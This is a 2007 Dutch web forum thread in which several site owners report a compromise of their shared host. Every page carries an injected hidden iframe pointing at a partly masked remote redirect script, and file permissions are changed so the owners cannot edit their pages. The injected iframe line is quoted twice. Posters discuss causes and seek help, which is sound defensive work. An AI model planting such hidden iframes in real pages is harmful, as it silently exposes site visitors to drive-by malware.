Check alle échte Black Friday-deals Ook zo moe van nepaanbiedingen? Wij laten alleen échte deals zien
Toon posts:

Website gehackt (?)

Pagina: 1
Acties:
  • 182 views sinds 30-01-2008
  • Reageer

woensdag 3 oktober 2007 19:52

Acties:

Verwijderd

Topicstarter
Ik zit met een vreemd probleem op mijn website. Ik wil vandaag aan een paar pagina's aanpassingen doen, maar nu blijkt dat helemaal onderaan mijn pagina deze tekst staat :

<iframe src='http://1941rev*****.org/redirect1.php' style='display:none'></iframe>

Vraag 1 : Waar komt dat in hemelsnaam vandaan? Het staat niet in 1 HTML-pagina maar in allemaal.
Vraag 2 : Surf ik naar die link, dan valt Safari weg, surf ik alleen naar het eerste deel dan kom ik wel op een zeer rare pagina uit.

Het tweede punt, ik kan geen aanpassingen meer doen aan mijn website. Niet meer via Transmit. Dan krijg ik deze waarschuwing :
Code:
Server zei:
***.html: Permission denied

Fout: -160: could not start data transfer


Probeer ik het via DirectAdmin dan krijg ik deze fout :

Code:
Unable to save your changes


Heeft er iemand een idee wat er gebeurt zou kunnen zijn met mijn website?

Edit : de website is www.ben*****.com

[ Voor 1% gewijzigd door RobIII op 03-10-2007 20:46 . Reden: Potentieel gevaarlijke links weggehaald ]

woensdag 3 oktober 2007 19:53

Acties:
  • --MeAngry--
  • Registratie: September 2002
  • Laatst online: 30-11 21:13

--MeAngry--

aka Qonstrukt

Ik zou even contact opnemen met je hostingpartij, want je bent duidelijk gehackt. Waarschijnlijk draait je hoster nog aardig oude software.

Tesla Model Y RWD (2024)

woensdag 3 oktober 2007 19:55

Acties:
  • speeder1988
  • Registratie: Maart 2007
  • Laatst online: 17-10 05:46

speeder1988

Wanneer ik op je site kom krijg ik gelijk een trojan die geblokkeerd.

woensdag 3 oktober 2007 19:55

Acties:
  • Marzman
  • Registratie: December 2001
  • Niet online

Marzman

They'll never get caught.

Waarschijnlijk kun je de pagina niet meer bewerken omdat de pagina is bewerkt door een lek phpscript en de rechten nu op apache staan in plaats van op jouw loginnaam. Kan je de pagina nog wel verwijderen? Anders is de makkelijkste optie je host de pagina te laten verwijderen.

☻/ Please consider the environment before printing this signature
/▌
/ \ <-- This is bob. copy and paste him and he will soon take over the world.

woensdag 3 oktober 2007 19:56

Acties:

Verwijderd

Zo te zien is de link naar waardie naartoe wijst, dood. Maar goed ook :) Maar blijkbaar is je server idd gehacked, niet aan jouw kant maar wellicht aan de kant van de hoster.

woensdag 3 oktober 2007 19:56

Acties:

Verwijderd

Deze website wil deze invoegtoepassing uitvoeren: 'Microsoft Data Access - Remote Data Services Dat...' van Microsoft Corporation

liever niet dus :P

woensdag 3 oktober 2007 19:56

Acties:
  • MadMarky
  • Registratie: Augustus 2001
  • Niet online

MadMarky

Begint eer ge bezint

Over de hoster gesproken, ook hun website is al een tijdje niet meer bijgewerkt en zelfs niet eens afgebouwd.

🖥️ | 🚗

woensdag 3 oktober 2007 20:28

Acties:
  • Xcalibur
  • Registratie: Augustus 2002
  • Laatst online: 14:31

Xcalibur

Dit had iemand die ik ken ook pas. Ding weggehaald en geadviseerd de hoster te bellen.... nooit meer wat van gehoord bedenk ik me nu... :/

Designer | Developer | Director | Photographer | LARPer | Geek | Male | 39

woensdag 3 oktober 2007 20:32

Acties:
  • orf
  • Registratie: Augustus 2005
  • Laatst online: 13:50

orf

Bij mij een aantal jaar geleden ook gebeurt. Bleek dat met FTP aan elk bestand een stukje code (iframe) werd toegevoegd en daarna het bestand ge-chmod was zodat het niet meer schrijfbaar was.

Ik had een ingewikkeld wachtwoord, maar door dat wachtwoord te googlen kwam ik op een russisch hackerforum. :X

Uiteindelijk bleken alle FTP wachtwoorden van die server op straat te liggen vanwege de onkunde van de (redelijk grote) webhoster.

woensdag 3 oktober 2007 20:40

Acties:

Verwijderd

Als het gaat om een 0-day exploit dan kan je je host niet echt verantwoordelijk houden... Een exploit dat al blijkbaar maanden rondhangt is natuurlijk veel amateuristischer voor een hosterbedrijf wat zichzelf nog niet eens beschermd heeft hiervoor.

woensdag 3 oktober 2007 20:52

Acties:
  • RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
Beste Ben271185,

Ik heb even je topicstart aangepast want er stonden nogal wat (potentieel gevaarlijke) links in; om onze medeGoTters te beschermen tegen allerlei enge dingen heb ik die dus even weggehaald. Gelieve dit voortaan niet meer te doen. Je kunt je punt ook prima zonder deze links duidelijk maken.

Tevens een move naar B&V, want dit heeft verder weinig met WEB te maken.

[ Voor 14% gewijzigd door RobIII op 03-10-2007 20:52 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

woensdag 3 oktober 2007 20:55

Acties:
  • Onno_Devine
  • Registratie: Mei 2005
  • Laatst online: 30-11 20:06

Onno_Devine

RobIII schreef op woensdag 03 oktober 2007 @ 20:52:
Beste Ben271185,

Ik heb even je topicstart aangepast want er stonden nogal wat (potentieel gevaarlijke) links in; om onze medeGoTters te beschermen tegen allerlei enge dingen heb ik die dus even weggehaald. Gelieve dit voortaan niet meer te doen. Je kunt je punt ook prima zonder deze links duidelijk maken.

Tevens een move naar B&V, want dit heeft verder weinig met WEB te maken.
Als je die site bezocht, kwam je op niets uit, althans een blank scherm.
Wat wilt men eigenlijk hiermee bereiken? (aan de hand van een redirect?)

woensdag 3 oktober 2007 21:01

Acties:
  • RobIII
  • Registratie: December 2001
  • Niet online

RobIII

Admin Devschuur®

^ Romeinse Ⅲ ja!

(overleden)
Onno_Devine schreef op woensdag 03 oktober 2007 @ 20:55:
Als je die site bezocht, kwam je op niets uit, althans een blank scherm.
Aan de reacties te zien hier in dit topic niet he? ;) En ook bij mij begint Firefox driftig te babbelen met ***.org :+ En dan nog; waarom überhaupt een onnodig risico nemen? De links doen helemaal niet ter zake.
Onno_Devine schreef op woensdag 03 oktober 2007 @ 20:55:
Wat wilt men eigenlijk hiermee bereiken? (aan de hand van een redirect?)
Who knows; wellicht is het al offline gehaald of werkt het inmiddels niet meer. Misschien is het wel geslashdot en werkt het morgen weer wel. En de motieven? Your, or anyone's, guess is as good as mine.

[ Voor 12% gewijzigd door RobIII op 03-10-2007 21:08 ]

There are only two hard problems in distributed systems: 2. Exactly-once delivery 1. Guaranteed order of messages 2. Exactly-once delivery.

Je eigen tweaker.me redirect

Over mij

donderdag 4 oktober 2007 18:52

Acties:
  • Koploper
  • Registratie: Oktober 2006
  • Laatst online: 30-11 22:48

Koploper

Ik heb sinds vandaag hetzelfde probleem. Mijn phpBB 3 RC 5 forum is onder andere ook gehackt. Bij elke pagina is ook deze regel toegevoegd:
<iframe src='http://1941rev*****.org/redirect1.php' style='display:none'></iframe>

Ik ben bang dat het dus om een zero day exploit gaat.
Ik ga in ieder geval ff contact op nemen met mijn hosting!

donderdag 4 oktober 2007 19:25

Acties:
  • MadMarky
  • Registratie: Augustus 2001
  • Niet online

MadMarky

Begint eer ge bezint

Dat hoeft niet persé aan PHPBB te liggen, gebruikt de hoster wel een up-to-date php versie?

🖥️ | 🚗

donderdag 4 oktober 2007 19:42

Acties:
  • Koploper
  • Registratie: Oktober 2006
  • Laatst online: 30-11 22:48

Koploper

Ik snap dat het niet perse aan phpBB hoeft te liggen. Want ik ben er net achter gekomen dat mijn normale website (gewoon html) ook is gehackt.
Mijn hoster gebruikt php-versie 5.0.37. Ik las op php.net dat inmiddels php-versie 5.2.4 uit is. Dus helemaal up-to-date is het niet volgens mij. :/

donderdag 4 oktober 2007 19:45

Acties:
  • DiedX
  • Registratie: December 2000
  • Laatst online: 14:48

DiedX

Des te meer een vermoeden dat IIS (de webserver) is aangepast. Dat ligt niet aan je HTML (tamelijk statisch), maar des te meer aan je webhoster.

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards

vrijdag 5 oktober 2007 17:59

Acties:
  • Koploper
  • Registratie: Oktober 2006
  • Laatst online: 30-11 22:48

Koploper

Het lijkt mij inmiddels duidelijk dat het aan de hoster ligt. Want ik ben er net achter gekomen dat ik en Ben271185 dezelfde hoster hebben. Helaas heb ik nog steeds geen reactie gehad op mijn mailtje aan hen, en telefonisch zijn ze ook niet bereikbaar. Dit terwijl ze normaal wel altijd heel snel zijn met het beantwoorden van email's. :/

woensdag 10 oktober 2007 15:43

Acties:
  • deefdeef
  • Registratie: Oktober 2004
  • Laatst online: 05-10 16:27

deefdeef

wat is de naam van jou hoster?
ik zit op een forum waar ze dit probleem ook hebben en ben benieuwd of die ook dezelfde heeft als jullie.

woensdag 10 oktober 2007 21:56

Acties:
  • MadMarky
  • Registratie: Augustus 2001
  • Niet online

MadMarky

Begint eer ge bezint

Die site is gehost bij 1Mhosting

🖥️ | 🚗

Pagina: 1
Reageer

Apple iPhone 17 LG OLED evo G5 Google Pixel 10 Samsung Galaxy S25 Star Wars: Outlaws Nintendo Switch 2 Apple AirPods Pro (2e generatie) Sony PlayStation 5 Pro

Tweakers is onderdeel van DPG Media B.V.
Alle rechten voorbehouden - Auteursrecht © 1998 - 2025 Hosting door TrueFullstaq